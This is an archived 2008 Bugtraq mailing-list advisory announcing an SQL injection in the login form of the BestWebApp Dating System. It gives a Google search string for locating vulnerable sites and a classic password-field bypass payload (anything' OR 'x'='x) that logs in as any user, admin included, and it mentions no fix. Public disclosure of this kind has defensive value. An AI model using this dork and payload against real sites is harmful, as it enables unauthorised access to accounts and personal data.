Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[Aria-Security.Net] BestWebApp Dating System SQL Injection

From: no-reply () Aria-Security Net
Date: 22 Feb 2008 21:53:14 -0000
Aria-Security Team (Persian Security Network)
http://Aria-Security.net
-------------------------------
Shutouts: AurA, imm02tal
Original Advisory and more info about this vulnerability: http://forum.aria-security.net/showthread.php?p=1442
Vendor: http://www.bestwebapp.com
Google Search: inurl:login_form.asp DATING Website

Login_form.asp
Chose Any username you want, doesnt matter, it can be admin, or just a normal user. YOU CHOSE!
Password: anything' OR 'x'='x


Regards,
The-0utl4w
Credits Goes To Aria-Security.Net
Previous By Date Next
Previous By Thread Next

Current thread: